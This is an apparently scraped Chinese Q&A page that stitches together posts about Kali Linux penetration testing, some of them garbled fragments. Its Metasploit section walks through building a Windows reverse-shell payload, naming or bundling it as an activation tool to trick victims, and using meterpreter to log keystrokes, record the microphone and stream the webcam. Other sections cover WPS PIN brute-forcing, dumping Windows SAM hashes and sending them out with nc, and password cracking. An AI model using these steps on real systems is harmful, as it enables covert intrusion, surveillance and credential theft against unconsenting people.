❶ 什麼是kali linux web 滲透測試
就是用Kali Linux上面的工具對某個Web網站進行滲透,這個滲透的過程是一個完整的入侵的過程,從而測試Web網站是否有被入侵的可能,並找出網站所存在的漏洞,最後可能還要向對方提交一份滲透測試報告。
❷ 誰有CTO學院的「kali linux web滲透測試」的所有視頻啊有的話請提供網盤鏈接,提取
你可以去下載啊,視頻緩存……
❸ Kali從入門到銀手鐲(二):開啟WPS的無線網路滲透測試
很多無線路由器都支持WPS(Wifi Protection Setup)功能,它是一種可以讓用戶無需密碼直接連接Wifi的技術。本來這種技術的初衷是讓用戶更加方便的連接網路,但是因為它有嚴重的安全漏洞,所以反而讓用戶的網路更加不安全。因此在這里推薦大家使用路由器的時候沒事就把WPS功能關掉。
因為要進行滲透測試,所以首先我先把自己路由器的WPS功能開啟,當然測試結束之後別忘了關閉WPS功能。
使用前一篇文章介紹的方法安裝好Kali虛擬機或者U盤系統,然後就可以准備開始了。
當然這里使用到的工具並不是只有Kali能用,其他Linux發行版也可以使用。但是還是推薦Kali,因為很多滲透測試工具都是按照安防論文的理論來實現的,很多都已經不再維護了。而Kali收集了很多尚在維護的工具分支,如果你使用其他發行版的話,可能其軟體倉庫中的版本還是原來的舊版本。
本文比較簡單,涉及到的工具有兩個,reaver和aircrack-ng。
我用的是台式機安裝的Kali虛擬機系統,自然是沒有無線功能的,所以需要一塊無線網卡。值得稱道的是現在Linux驅動非常完善了,我原來買的360無線網卡可以直接驅動成功。
連接方法也十分簡單,電腦插上無線網卡,然後在VMware軟體右下角找到無線網卡的圖標,點擊並選擇連接到虛擬機,這樣就大功告成了。整個系統可能會卡幾秒鍾,之後就正常了。
連接成功後,在Kali虛擬機中應該可以看到Wifi圖標了,用lsusb命令還可以查看到無線網卡的廠商和具體型號,可以看到我的無線網卡具體型號是MT7601U。
首先輸入 sudo airmon-ng 命令查看一下當前系統中的無線網卡,在Kali中這個介面名默認應該是wlan0。
然後輸入下面的命令關閉可能影響網卡監聽的程序,然後開啟監聽模式。開啟完畢之後,再次輸入 sudo airmon-ng ,應該就會看到這次介面名變成了wlan0mon,這樣就說明成功開啟了監聽模式,可以進行下一步了。
輸入下面的命令開始掃描附近的無線網路。
稍後應該就會顯示出附近開啟了WPS的所有網路了,dBm是信號大小,值越小說明信號越強,按Ctrl+C即可中斷命令。如果想要查看所有網路的話,可以添加 -a 參數,它會列出所有網路(包括了未開啟WPS功能的網路)。
這時候就要記下來網路的BSSID(網路Mac地址)以及ESSID(網路名稱),准備好下一步的工作了。
好了,下面就可以開始正式的工作了,其實說起來原理也很簡單,WPS PIN是一個8位數字密碼,所以其實我們要做的就是不斷的嘗試,最終找到這個PIN。總共需要嘗試的次數有一億次,看起來這個數字非常大,但是在安全領域,一億次算是一個非常小的次數了,很多加密演算法要攻破甚至需要全世界所有計算機同時計算幾百年。
當然要搞定WPS的PIN並不需要這么長時間,最多10來個小時就可以了,平均用時可能也就4-5個小時左右。而且一旦知道了PIN,獲得WIFI密碼僅需要數秒即可搞定。之後只要PIN碼沒有發生變化,就算WIFI密碼被修改,也可以很輕松的搞定。
接下來就要輪到本文的主角登場了,這就是reaver,專門用於破解WPS Wifi網路的工具。輸入 -h 參數即可查看幫助信息,這里簡單列出一些我們要使用的參數。
詳細參數參考reaver的幫助,並不難懂。
了解了reaver命令行的用法之後,就可以正式開始了。很多時候一次可能並不能成功,需要嘗試多次。
因為是測試,所以我乾脆直接指定了PIN的值。為了更詳細的了解命令運行過程,可以開啟2級或者3級輸出看看reaver工具到底幹了啥。
如果出現了下面的bad FCS,可以在添加 -F 參數忽略幀校驗錯誤,然後再次嘗試。
如果一切正常的話,應該會在幾分鍾內通過PIN解開WIFI的密碼。如果不知道PIN密碼的話,也可以通過幾個小時的嘗試來試出PIN進而得知WIFI密碼。因此我們在日常使用的時候,一定要記得關掉WPS功能,它是很多漏洞的根源。
❹ 怎麼用kali系統滲透
Kali是一個滲透測試的平台是所有工具的一個集合,要學習滲透測試需要分階段,分層次和目標的學習。
❺ 如何進行Web滲透測試
什麼是滲透測試?
滲透測試,是滲透測試工程師完全模擬黑客可能使用的攻擊技術和漏洞發現技術,對目標網路、主機、應用的安全作深入的探測,發現系統最脆弱的環節。
如何進行Web滲透測試?
完整web滲透測試框架當需要測試的web應用數以千計,就有必要建立一套完整的安全測試框架,流程的最高目標是要保證交付給客戶的安全測試服務質量。
1、立項:項目建立,時間安排,人力分配,目標制定,廠商介面人確定;
系統分析&威脅分析:針對具體的web應用,分析系統架構、使用的組件、對外提供的介面等,以STRIDE為威脅模型進行對應的安全威脅分析,輸出安全威脅分析表,重點關注top3威脅;
制定測試用例:根據威脅分析的結果制定對應的測試用例,測試用例按照模板輸出,具備可執行性;
測試執行&漏洞挖掘:測試用例執行&發散測試,挖掘對應的安全問題or漏洞;
問題修復&回歸測試:指導客戶應用開發方修復安全問題or漏洞,並進行回歸測試,確保安全問題or漏洞得到修復,並且沒有引入新的安全問題;
項目總結評審:項目過程總結,輸出文檔評審,相關文檔歸檔。
2、Web應用的滲透測試流程
主要分為3個階段,分別是:信息收集→漏洞發現→漏洞利用,下面仔細分析一下各個階段流程:
一、信息收集
在信息收集階段,我們需要盡量多的收集關於目標web應用的各種信息,比如:腳本語言的類型、伺服器的類型、目錄的結構、使用的開源軟體、資料庫類型、所有鏈接頁面,用到的框架等
腳本語言的類型:常見的腳本語言的類型包括:php、asp、aspx、jsp等
測試方法:
1 爬取網站所有鏈接,查看後綴
2 直接訪問一個不存在頁面後面加不同的後綴測試
3 查看robots.txt,查看後綴
伺服器的類型:常見的web伺服器包括:apache、tomcat、IIS、ngnix等
測試方法:
1 查看header,判斷伺服器類型
2 根據報錯信息判斷
3 根據默認頁面判斷
目錄的結構:了解更多的目錄,可能發現更多的弱點,如:目錄瀏覽、代碼泄漏等。
測試方法
1 使用字典枚舉目錄
2 使用爬蟲爬取整個網站,或者使用google等搜索引擎獲取
3 查看robots.txt是否泄漏
使用的開源軟體:我們如果知道了目標使用的開源軟體,我們可以查找相關的軟體的漏洞直接對網站進行測試。
測試方法
指紋識別(網路上有很多開源的指紋識別工具)
資料庫類型:對於不同的資料庫有不同的測試方法。
測試方法
1 使應用程序報錯,查看報錯信息
2 掃描伺服器的資料庫埠(沒做NAT且防火牆不過濾時有效)
所有鏈接頁面:這個跟前面的獲取目錄結構類似,但是這個不只是獲取網站的所有功能頁面,有時候還可以獲取到管理員備份的源碼。
測試方法
1 使用字典枚舉頁面
2 使用爬蟲爬取整個網站,或者使用google等搜索引擎獲取
3 查看robots.txt是否泄漏
用到的框架:很多網站都利用開源的框架來快速開發網站,所以收集網站的框架信息也是非常關鍵的。
測試方法
指紋識別(網路上有很多開源的指紋識別工具)
二、漏洞發現
在這個階段我們在做測試的時候要對症下葯,不能盲目的去掃描,首先要確定目標應用是否使用的是公開的開源軟體,開源框架等、然後在做深一度的漏洞掃描。
關於開源軟體的漏洞發現
開源的軟體:常見的開源軟體有wordpress、phpbb、dedecms等
開源的框架:常見的開源框架有Struts2、 Spring MVC、ThinkPHP等
中間件伺服器:常見的中間件伺服器有jboss、tomcat、Weblogic等
資料庫服務:常見的資料庫服務mssql、mysql、oracle、redis、sybase、MongoDB、DB2等
對於開源軟體的測試方法
1 通過指紋識別軟體判斷開源軟體的版本信息,針對不同的版本信息去開放的漏洞資料庫查找相應版本的漏洞進行測試
2 對於默認的後台登錄頁、資料庫服務埠認證等入口可以進行簡單的暴力破解、默認口令嘗試等操作
3 使用開源的漏洞發現工具對其進行漏洞掃描,如:WPScan
關於自主開發的應用
手動測試:這個階段,我們需要手工測試所有與用戶交互的功能,比如:留言、登入、下單、退出、退貨、付款等操作
軟體掃描:使用免費的軟體掃描,如:appscan、wvs、netsparker,burp等
可能存在的漏洞
Owasp關鍵點
代碼安全之上傳文件
代碼安全之文件包含
代碼安全之SSRF
邏輯漏洞之密碼重置
邏輯漏洞之支付漏洞
邏輯漏洞之越權訪問
平台安全之中間件安全
三、漏洞利用
針對不同的弱點有不同的漏洞利用方式,需要的知識點也比較多。一般這個階段包括兩種方式,一種是手工測試,一種是工具測試
手工測試
手工測試是通過客戶端或伺服器訪問目標服務,手工向目標程序發送特殊的數據,包括有效的和無效的輸入,觀察目標的狀態、對各種輸入的反應,根據結果來發現問題的漏洞檢測技術。手工測試不需要額外的輔助工具,可由測試者獨立完成,實現起來比較簡單。但這種方法高度依賴於測試者,需要測試者對目標比較了解。手工測試可用於Web應用程序、瀏覽器及其他需要用戶交互的程序。
這種方式對於有特殊過濾等操作,或者網路上沒有成型的利用工具的時候可以使用。
工具測試
網路上有很多好用的免費利用工具,比如針對sql注入的sqlmap、針對軟體漏洞的matesploit等。
❻ Kali利用msf滲透Windows電腦(超詳細)
前言
最近整理了一些 奇安信&華為&深信服大佬 的課件資料+大廠面試課題,想要的可以私信自取, 無償贈送 給粉絲朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成後門的軟體。
MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。
演示環境
使用Kali 2021.3進行演示操作
目標靶機: Win10專業版
軟體:msfvenom、msfconsole(Kali系統內置)
1.進入管理員模式
命令: sudo su
解釋: 不在管理員模式下運行可能會有許可權不夠的提示,為了避免命令執行失敗,在管理員下運行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip> LPORT=本地埠號> –f exe –o 文件名>.exe
解釋: 本地ip寫自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地埠自己隨便設置一個沒有被佔用的埠號,如果埠號被佔用那麼文件會生成失敗,換一個埠號就性
文件名可以隨便寫自己喜歡的名字,比如寫Win10激活工具,可能更容易讓目標主機上鉤
當然MSF也可以用來滲透手機、mac、Linux等
接下來運行命令生成文件
默認生成的文件在根目錄下
把剛才生成的文件放到目標靶機Win10系統中
命令: msfconsole
(1)命令: use exploit/multi/handler(選擇模塊)
(2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)
(3)命令: set LhOST 192.168.32.1(填寫自己主機的IP地址)
(4)命令: set lport 1111(填寫剛才生成文件時的埠號)
(5)命令: show options(查看設置參數)
(6)命令: exploit -z -j(後台執行)
我們這里也可以把這個程序偽裝一下,把他的圖標改一下,或者把它捆綁在某些軟體上面,當用戶打開就自動安裝到對方電腦上面
(1)命令: sessions (查看上鉤的用戶)
(2)命令: sessions -i 1 (選擇需要攻擊的用戶,這里選擇第 1 個
命令: run vnc -i
cmd指令:
cat 讀取文件內容到屏幕
cd 更改目錄
checksum 檢索文件的校驗和
cp 將源復制到目標
del 刪除指定文件
dir 列出文件(ls 的別名)
下載 下載文件或目錄
編輯 編輯文件
getlwd 列印本地工作目錄
getwd 列印工作目錄
lcd 更改本地工作目錄
lls 列出本地文件
lpwd 列印本地工作目錄
ls 列出文件
mkdir 創建目錄
mv 將源移動到目標
pwd 列印工作目錄
rm 刪除指定文件
rmdir 刪除目錄
search 搜索文件
show_mount 列出所有掛載點/邏輯驅動器
upload 上傳文件或目錄
pkill 按名稱終止進程
keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)
keyscan_mp 轉儲按鍵緩沖(下載鍵盤記錄)
keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)
record_mic X秒從默認的麥克風record_mic音頻記錄(音頻錄制)
webcam_chat 開始視頻聊天(視頻,對方會有彈窗)
webcam_list 單攝像頭(查看攝像頭列表)
webcam_snap 採取快照從指定的攝像頭(攝像頭拍攝一張照片)
webcam_stream 播放視頻流從指定的攝像頭(開啟攝像頭監控)
enumdesktops 列出所有可訪問的桌面和窗口站(窗體列表)
getdesktop 得到當前的Meterpreter桌面
reboot 重新啟動遠程計算機
shutdown 關閉遠程計算機
shell 放入系統命令 shell
enumdesktops 列出所有可訪問的桌面和窗口站
getdesktop 獲取當前的meterpreter桌面
idletime 返回遠程用戶空閑的秒數
keyboard_send 發送擊鍵
keyevent 發送按鍵事件
keyscan_mp 轉儲擊鍵緩沖區
keyscan_start 開始捕獲擊鍵
keyscan_stop 停止捕獲擊鍵
mouse 發送滑鼠事件
screenshare 實時觀看遠程用戶桌面
screenshot 抓取互動式桌面的屏幕截圖
setdesktop 更改 Meterpreters 當前桌面
uictl 控制一些用戶界面組件
record_mic 從默認麥克風錄制音頻 X 秒
webcam_chat 開始視頻聊天
webcam_list 列出網路攝像頭
webcam_snap 從指定的網路攝像頭拍攝快照
webcam_stream 播放來自指定網路攝像頭的視頻流
play 在目標系統上播放波形音頻文件 (.wav)
getsystem 嘗試將您的許可權提升到本地系統的許可權
execute -f notepad 打開記事本
————————————————
原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123367668
❼ 網路安全乾貨知識分享 - Kali Linux滲透測試 106 離線密碼破解
前言
最近整理了一些 奇安信&華為大佬 的課件資料+大廠面試課題,想要的可以私信自取, 無償贈送 給粉絲朋友~
1. 密碼破解簡介
1. 思路
目標系統實施了強安全措施
安裝了所有補丁
無任何已知漏洞
無應用層漏洞
攻擊面最小化
社會 工程學
獲取目標系統用戶身份
非授權用戶不受信,認證用戶可以訪問守信資源
已知用戶賬號許可權首先,需要提權
不會觸發系統報警
2. 身份認證方法
證明你是你聲稱你是的那個人
你知道什麼(賬號密碼、pin、passphrase)
你有什麼(令牌、token、key、證書、密寶、手機)
你是誰(指紋、視網膜、虹膜、掌紋、聲紋、面部識別)
以上方法結合使用
基於互聯網的身份驗證仍以賬號密碼為主要形式
3. 密碼破解方法
人工猜解
垃圾桶工具
被動信息收集
基於字典暴力破解(主流)
鍵盤空間字元爆破
字典
保存有用戶名和密碼的文本文件
/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists
4. 字典
1. 簡介
鍵盤空間字元爆破
全鍵盤空間字元
部分鍵盤空間字元(基於規則)
數字、小寫字母、大寫字元、符號、空格、瑞典字元、高位 ASCII 碼
2. crunch 創建密碼字典
無重復字元
crunch 1 1 -p 1234567890 | more
1
必須是最後一個參數
最大、最小字元長度失效,但必須存在
與 -s 參數不兼容(-s 指定起始字元串)
crunch 4 4 0123456789 -s 9990
讀取文件中每行內容作為基本字元生成字典
crunch 1 1 -q read.txt
1
字典組成規則
crunch 6 6 -t @,%%^^ | more
-t:按位進行生成密碼字典
@:小寫字母 lalpha
,:大寫字母 ualpha
%:數字 numeric
^:符號 symbols
輸出文件壓縮
root@kali:~# crunch 4 5 -p dog cat bird
1
-z:指定壓縮格式
其他壓縮格式:gzip、bzip2、lzma
7z壓縮比率最大
指定字元集
root@kali:~# crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o w.txt -t @d@@ -s cdab
1
隨機組合
root@kali:~# crunch 4 5 -p dog cat bird
1
crunch 5 5 abc DEF + !@# -t ,@^%,
在小寫字元中使用abc范圍,大寫字元使用 DEF 范圍,數字使用佔位符,符號使用!@#
佔位符
轉義符(空格、符號)
佔位符
root@kali:~# crunch 5 5 -t ddd%% -p dog cat bird
1
任何不同於 -p 參數指定的值都是佔位符
指定特例
root@kali:~# crunch 5 5 -d 2@ -t @@@%%
1
2@:不超過兩個連續相同字元
組合應用
crunch 2 4 0123456789 | aircrack-ng a.cap -e MyESSID -w -
crunch 10 10 12345 –stdout | airolib-ng testdb -import passwd -
3. CUPP 按個人信息生成其專屬的密碼字典
CUPP:Common User Password Profiler
git clone https://github.com/Mebus/cupp.git
python cupp.py -i
4. cewl 通過收集網站信息生成字典
cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
-m:最小單詞長度
-d:爬網深度
-e:收集包含email地址信息
-c:每個單詞出現次數
支持基本、摘要 身份認證
支持代理
5. 用戶密碼變型
基於 cewl 的結果進行密碼變型
末尾增加數字串
字母大小寫變化
字母與符號互相轉換
字母與數字互相轉換
P@$w0rd
6. 使用 John the Ripper 配置文件實現密碼動態變型
2. 在線密碼破解
1. hydra
簡介
密碼破解
Windows 密碼破解
Linux 密碼破解
其他服務密碼破解
圖形化界面
xhydra
HTTP表單身份認證
密碼破解效率
密碼復雜度(字典命中率)
帶寬、協議、伺服器性能、客戶端性能
鎖定閾值
單位時間最大登陸請求次數
Hydra 的缺點
穩定性差,程序時常崩潰
速度控制不好,容易觸發服務屏蔽或鎖死機制
每主機新建進程,每服務新建實例
大量目標破解時性能差
2. pw-inspector
Hydra 小工具 pw-inspector
按長度和字元集篩選字典
pw-inspector -i /usr/share/wordlists/nmap.lst -o p1.lst -l
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u -m 3 -M 5
3. mesa
Mesa 的特點
穩定性好
速度控製得當
基於線程
支持模塊少於hydra(不支持RDP)
WEB-Form 支持存在缺陷
查看支持的模塊
參數
-n:非默認埠
-s:使用SSL連接
-T:並發主機數
mesa -M ftp -q
3. 離線密碼破解
1. 簡介
身份認證
禁止明文傳輸密碼
每次認證使用HASH演算法加密密碼傳輸(HASH演算法加密容易、解密困難)
伺服器端用戶資料庫應加鹽加密保存
破解思路
嗅探獲取密碼HASH
利用漏洞登陸伺服器並從用戶資料庫獲取密碼HASH
識別HASH類型
長度、字元集
利用離線破解工具碰撞密碼HASH
優勢
離線不會觸發密碼鎖定機制
不會產生大量登陸失敗日誌引起管理員注意
2. HASH 識別工具
1. hash-identifier
進行 hash 計算
結果:
進行 hash 識別
2. hashid
可能識別錯誤或無法識別
3. HASH 密碼獲取
1. sammp2
Windows HASH 獲取工具
利用漏洞:Pwmp、fgmp、 mimikatz、wce
物理接觸:sammp2
將待攻擊主機關機
使用 Kali ISO 在線啟動此主機
發現此 windows 機器安裝有兩塊硬碟
mount /dev/sda1 /mnt
將硬碟掛載
cd /mnt/Windows/System32/config
切換目錄
sammp2 SYSTEM SAM -o sam.hash
導出密碼
利用 nc 傳輸 HASH
HASH 值:
2. syskey 工具進行密碼加密
使用 syskey 進行加密(會對 SAM 資料庫進行加密)
重啟需要輸入密碼才能進一步登錄
使用 kali iso live
獲取到 hash 值
hashcat 很難破解
使用 bkhive 破解
使用 Bootkey 利用RC4演算法加密 SAM 資料庫
Bootkey 保存於 SYSTEM 文件中
bkhive
從 SYSTEM 文件中提取 bootkey
Kali 2.0 拋棄了 bkhive
編譯安裝 :http://http.us.debian.org/debian/pool/main/b/bkhive/
在windows的 kali live 模式下,運行
sammp2 SAM key (版本已更新,不再支持此功能)
建議使用 Kali 1.x
1. Hashcat
簡介
開源多線程密碼破解工具
支持80多種加密演算法破解
基於CPU的計算能力破解
六種模式 (-a 0)
0 Straight:字典破解
1 Combination:將字典中密碼進行組合(1 2 > 11 22 12 21)
2 Toggle case:嘗試字典中所有密碼的大小寫字母組合
3 Brute force:指定字元集(或全部字元集)所有組合
4 Permutation:字典中密碼的全部字元置換組合(12 21)
5 Table-lookup:程序為字典中所有密碼自動生成掩碼
命令
hashcat -b
hashcat -m 100 hash.txt pass.lst
hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d
結果:hashcat.pot
hashcat -m 100 -a 3 hash -i –increment-min 6 –increment-max 8 ?l?l?l?l?l?l?l?l
掩碼動態生成字典
使用
生成文件
計算 hash 類型
結果 MD5
查看 MD5 代表的值
進行破解
2. oclhashcat
簡介
號稱世界上最快、唯一的基於GPGPU的密碼破解軟體
免費開源、支持多平台、支持分布式、150+hash演算法
硬體支持
虛擬機中無法使用
支持 CUDA 技術的Nvidia顯卡
支持 OpenCL 技術的AMD顯卡
安裝相應的驅動
限制
最大密碼長度 55 字元
使用Unicode的最大密碼長度 27 字元
關於版本
oclHashcat-plus、oclHashcat-lite 已經合並為 oclhashcat
命令
3. RainbowCrack
簡介
基於時間記憶權衡技術生成彩虹表
提前計算密碼的HASH值,通過比對HASH值破解密碼
計算HASH的速度很慢,修改版支持CUDA GPU
https://www.freerainbowtables.com/en/download/
彩虹表
密碼明文、HASH值、HASH演算法、字元集、明文長度范圍
KALI 中包含的 RainbowCrack 工具
rtgen:預計算,生成彩虹表,時的階段
rtsort:對 rtgen 生成的彩虹錶行排序
rcrack:查找彩虹表破解密碼
以上命令必須順序使用
rtgen
LanMan、NTLM、MD2、MD4、MD5、SHA1、SHA256、RIPEMD160
rtgen md5 loweralpha 1 5 0 10000 10000 0
計算彩虹表時間可能很長
下載彩虹表
http://www.freerainbowtables.com/en/tables/
http://rainbowtables.shmoo.com/
彩虹表排序
/usr/share/rainbowcrack
rtsort /md5_loweralpha#1-5_0_1000x1000_0.rt
密碼破解
r crack *.rt -h
rcrack *.rt -l hash.txt
4. John
簡介
基於 CPU
支持眾多服務應用的加密破解
支持某些對稱加密演算法破解
模式
Wordlist:基於規則的字典破解
Single crack:默認被首先執行,使用Login/GECOS信息嘗試破解
Incremental:所有或指定字元集的暴力破解
External:需要在主配配文件中用C語言子集編程
默認破解模式
Single、wordlist、incremental
主配置文件中指定默認wordlist
破解Linux系統賬號密碼
破解windows密碼
Johnny 圖形化界面的john
5. ophcrack
簡介
基於彩虹表的LM、NTLM密碼破解軟體
彩虹表:http://ophcrack.sourceforge.net/tables.php
❽ 作為小白如何學習Kali linux滲透測試技術
首先你要明白你學KALI的目的是什麼,其次你要了解什麼是kali,其實你並不是想要學會kali你只是想當一個hacker
kali是什麼:
只是一個集成了多種滲透工具的linux操作系統而已,拋開這些工具,他跟常規的linux沒有太大區別。
你可能想學的是滲透技巧,相當一個黑客是吧?我建議你先從基礎開始學起,比如漏洞是如何形成的,然後如何被利用,例:SQL注入漏洞。
如何成為一個黑客?:
-> 具有極高的興趣以及能夠持之以恆的心
-> 多結交良師益友很重要
->學習編程語言(python,php,html,JavaScript,java,c等,只有你會編程才能知道為什麼會形成漏洞,才知道怎麼利用漏洞)
->學習伺服器運維(winservice和linux操作系統,域管理,許可權管理等等等等不一一闡述)學習系統了解系統,因為你要了解一個站長是如何管理伺服器的,伺服器有哪些可以被你利用的地方,到時候用nmap掃描出來的結果你才能分析,才明白是什麼意思
->英文好很重要,國外文獻才能看得懂,英文好不好直接影響你能不能成為頂級黑闊
->多多實戰演練,從基礎的注入漏洞,XSS,弱口令,抓包等開始你的滲透生涯,等你拿到webshell的時候,你會有成就感 並且想學習的慾望越發強烈,等你拿到cmdshell的時候,你已經具備成為一個腳本小子的資格了,再往下走就要看你自己的天賦了,畢竟我的水平也僅限於此。
記住哦,一個hacker是要擺脫工具的,只會用工具永遠只是腳本小子。你要自己了解原理,然後自己寫工具出來。kali只是一個系統級滲透工具箱,只要你學會了滲透,有沒有kali一樣牛逼
此段摘自知乎Toom
❾ 一套Linux滲透教程(帶你玩轉Kali附安卓下Kali滲透,劫持等)(無KEY) 解壓密碼 謝謝!
這個教程就是個注水肉,一直逼逼歪歪,沒什麼實貨,簡直就是浪費生命
❿ 『Kali 無線滲透01』- 無線網卡的選擇及配置
思路一:使用MacBook Pro自帶無線網卡
MacBook Pro無線網卡信息:
卡類型: AirPort Extreme (0x14E4, 0x133)
固件版本: Broadcom BCM43xx 1.0 (7.77.61.1 AirPortDriverBrcmNIC-1305.2)
翻牆查資料N久,最接近成功的是這篇教程 Kali Linux Wireless/Wifi Adapter (Not detecting) [FIX] 2018 ,雖然ifconfig指令可以看到無線網卡信息,但是搜索不到周圍AP,也不能設置monitor模式。故放棄。
若有那位老兄使用MacBook Pro 自帶網卡可以設置成功,請您一定要在我博客下方留言告知!
思路二:使用外設USB無線網卡
aircrack-ng官方推薦網卡
注意:TP-Link TL-WN722N 一定要選擇V1版本
本來想選用業界推崇的WN722N,但是此型號在電商平台確實難求,所以在某寶選擇了「vendor」的無線網卡(Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter)。
無論我們選取哪款無線網卡做滲透測試,至少要滿足以下兩點:支持AP及monitor模式。
AP模式:可作為evil無線接入點
monitor模式:可以進行抓包
環境:MacBook Pro - Mac OS Mojave
虛擬機:VirtualBox
無線網卡:Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
注意:一定要選擇USB3.0(xHCI)控制器,否則iw指令或設置monitor模式會存在問題
wlan0就是我們所選擇的無線網卡
如果ifconfig命令中沒有發現wlan0,通過ifconfig -a查看無線網卡是否存在,若存在則證明wlan0沒有啟動,需要進行配置
通過iw list指令查看無線網卡詳細信息
查看支持介面模式
查看信道
或者使用iw list指令
還可以通過管道進行篩選:
搜索附近AP名稱
搜索附近AP名稱及信道
搜索名稱、信道及頻率
增加monitor模式
對無線網卡添加monitor模式後才可以進行無線抓包,命名規則在原有無線網卡名稱後添加mon,例:wlan0 -> wlan0mon
啟動wlan0mon
添加wlan0mon後不會自動啟動,需要手動進行啟動
刪除monitor
抓包之後可以刪除monitor
打開Wireshark 選擇wlan0mon